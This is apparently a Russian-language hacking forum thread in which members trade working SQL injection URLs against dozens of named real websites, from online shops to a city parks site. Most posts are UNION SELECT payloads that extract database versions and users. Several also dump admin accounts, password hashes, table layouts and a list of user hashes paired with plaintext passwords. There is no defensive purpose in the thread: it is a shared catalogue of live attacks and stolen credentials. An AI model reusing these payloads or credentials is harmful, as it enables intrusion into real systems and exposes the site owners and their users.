SQL Инъекции

Code:

http://www.sexshop-online.ru/index.php?part=-16+union+select+1,2,concat(database(),0x3a,version()),user(),5,6,7,8,9,10,11,12,13/*

sex shop => магазин, вот с таблицами у мну траблы. . .

 

ну вот например:

Code:

http://www.sexshop-online.ru/index.php?part=-16+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13+from+subscribers/*

спам-лист)

 

не знаю поможет,нет,есть таблица orders.

Люблю миллер

 

кода я прошлый раз выкладывал меня сюда послали...

 

www.pays-sud-aisne.fr

Code:

http://www.pays-sud-aisne.fr/index.php?page_id=-3+union+select+1,2,concat(version(),char(58,58),database(),char(58,58),user()),4/*

www.argusvalentines.com

Code:

http://www.argusvalentines.com/index.php?rayon_id=-267+union+select+concat(version(),char(58,58),database(),char(58,58),user()),2/*

www.selfserviceworld.com

Code:

http://www.selfserviceworld.com/research.php?rc_id=-417+union+select+concat(version(),char(58,58),database(),char(58,58),user()),2,3,4,5,6,7,8/*

 

Isis -

Code:

http://www.selfserviceworld.com/research.php?rc_id=-417+union+select+password,2,id,4,5,6,7,8+from+users/*

 

www.tozsdeforum.hu

Code:

http://www.tozsdeforum.hu/multiforum/forum_user.phtml?user_id=2+union+select+concat(version(),char(58,58),database(),char(58,58),user()),2,3,4/*

fragrancesandmore.com

Code:

http://fragrancesandmore.com/product_list_category.php?category_id=-48+union+select+1,convert(concat(version(),char(58,58),database(),char(58,58),user())+using+latin1)/*

www.vacationrental-hawaii.com

Code:

http://www.vacationrental-hawaii.com/vacationrentals/popup/calendar_year.php?rental_id=-1+union+select+1,user(),3,database(),char(32),char(32),version()/*&calyear=2007

 

http://www.trubka.net/showsoft.php?id=-1112+union+select+1,2,3,user(),5,6,7,version(),9,10,database(),12/*
http://www.rusbiotech.ru/novice/show.php?id=-1832+UNION+SELECT+1,2,3,user(),5,version(),7,database(),9,10/*

 

Студия бурусова

Code:

http://www.burusov.ru/cgi-bin/catalog/viewgroup.cgi?prigroup=-1+union+select+concat(name,char(58),user),version(),0,0%20from%20users/*

 

cont

нашел admins : username,password
kovacsp:$1$b1d048fb$0Lo0.JKNevQrCxMzizBVj/
user : userid,email
users : nick,passwd,email,homepage но выводится только ник, остальные поля нет (пустые?)

phpads_admin : admin,admin_pw,admin_email,name
kovacsp:188827d3e4098d591ad3a04e76836d7d

phpads_clients : clientid,clientusername,clientpassword,clientname,email

phpads_affiliates : username,password,name,website,email

 

www.pangeya.ru

ПАНГЕЯ
книжный интернет-магазин
эзотерической литературы ​

Code:

http://www.pangeya.ru/about_info.php?shopid=-1050/**/union/**/select/**/1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14+from+admin/*&page=1&tip=1&catid=17&sort=my,%20name

admin:e0bd24ef4ed786c54b7cd70f86ae47e8

 

www.nycgovparks.org

Code:

http://www.nycgovparks.org/sub_newsroom/daily_plants/daily_plant_main.php?id=-10606+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(version(),char(58,58),database(),char(58,58),user()),18,19,20,21,22,23,24,25,26/*

www.turk-jem.dergisi.org

Code:

http://www.turk-jem.dergisi.org/text.php3?id=-219+union+select+1,2,3,concat(version(),char(58,58),database(),char(58,58),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

www.together.spbru.net

Code:

http://www.together.spbru.net/prt.php?part=2+union+select+1,2,3,convert(concat(version(),char(58,58),database(),char(58,58),user())%20using%20cp1251),5,6,7,8,9/*

www.kioskmarketplace.com

Code:

http://www.kioskmarketplace.com/research.php?rc_id=-9999+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7,8/*

www.wolfgreenfield.com

Code:

http://www.wolfgreenfield.com/index.php?page=industries&sub=detail&id=1+union+select+1,concat(version(),char(58,58),database(),char(58,58),user())/*

 

http://www.boyersteel.com/products.php?id=-2+union+select+1,2,3,4/* лажа бррр тьфу

 

____

 

www.travelonline.ru

Code:

http://www.travelonline.ru/smallwin.php?pg=pinfo&id=-1+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7,8,9,10,11,12,13/*

www.archery.ru

Code:

http://www.archery.ru/news/?id=39'+union+select+1,2,3,concat(version(),char(58,58),database(),char(58,58),user()),5/*

koleso.topof.ru

Code:

http://koleso.topof.ru/news.php?pID=1621'+union+select+1,2,convert(concat(version(),char(58,58),database(),char(58,58),user())%20using%20cp1251),4,5,6,7,8,9,10,11,12,13,14,15/*

new.groteck.ru

Code:

http://new.groteck.ru/golosovalka/obrab2.php?question_id=1+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3/*

bl4u.ru

Code:

http://bl4u.ru/top.php?id=6817+union+select+1,2,concat(version(),char(58,58),database(),char(58,58),user()),4/*

 

Isis - new.groteck.ru

Code:

http://new.groteck.ru/golosovalka/obrab2.php?question_id=1+union+select+1,concat(id,0x3a,password,0x3a,email),3+from+users/*

Code:

3e01cfcabad4d6e3c15247cbea55550b:12345:[email protected]
a22b159764657f4dbb61f921f432f76f:3235017:[email protected]
fcdf1a4022712610921701dbf442d83b:htuekzwbz:[email protected]
dcf22761b01787d24615d930079bf36f:123:[email protected]
bfc16c5b7c86590af85f5cdd23103413:123456789:[email protected]
025e1cfc5e6a3ad901a811d9652fb0a5:trombonkl;kl;:[email protected]
a22b559764657f4dbg61f921f432f76f:pass2sys:[email protected]
a22b159764657f4dbb61f421f432f744:itsec2010:[email protected]
a22b5g97646e7f4dbgu1f92wf43uif73f:pass2groteck.admin:[email protected]

www.archery.ru

Code:

http://www.archery.ru/news/?id=39%27+union+select+1,2,concat(username,char(58),user_password,char(58),user_email,char(58),user_icq),4,5+from+phpbb_users/*

логин:хеш:мыло:icq

 

1)http://www.zhg.ru/sprav/orgs/org.php?id=3'
http://untp.org.ua/index.php?id=-131+union+select+1,2,version( ),4,5,6/*
c таблицами ж0па(

2)http://www.chayka.org/author.php?id=-163+order+by+3/*
http://gaia.arctic.org.ru/news/news.php?id=-74+union+select+1,version(),3,4,5,6,7+from+n ews/*
такая же хня из только news

Украина..........
3)http://untp.org.ua/index.php?id=-131+union+select+1,2,version( ),4,5,6/*

4)http://avd.org.ua/ukr/viewdetails.php?id=-142+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13, 14/*

5)http://cipa.org.ua/ukr/news/news.php?id=-135+union+select+1,version( ),3,4,5,6,7/*

 

ВНИМАНИЕ!!​

В связи с возросшим интересом к данной теме и появлению здесь огромного колличества боянов, за которые выставляються такие же положительные оценки как и за оригинал, я решил погонять тему и создать примитивный антибоянчик. Мера конечно запоздавшая но все-таки!
Просто проверяйте свои скули по собранному мной листу.
http://hlamidnik.h18.ru/SQLS.html

Система до безобразия проста, пока обработано только 27 страниц но до среды соберу там все.
З.Ы Имхо за боян надо выставлять неудовлетворительные оценки.
З.Ы.Ы Выделить бы какнить этот пост)

 

Code:

http://photo-masters.net/seminars.php?code=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+limit+0,1/*

^^

 

А лучше бы сделал так:
http://site.com
Ниже сайта ссылка на скуль маленьким шрифтом
И вообще какой-нибудь скрипт на пхп+мускл....

Т.к. за 194 тстраницы скулей очень много не рабочих =)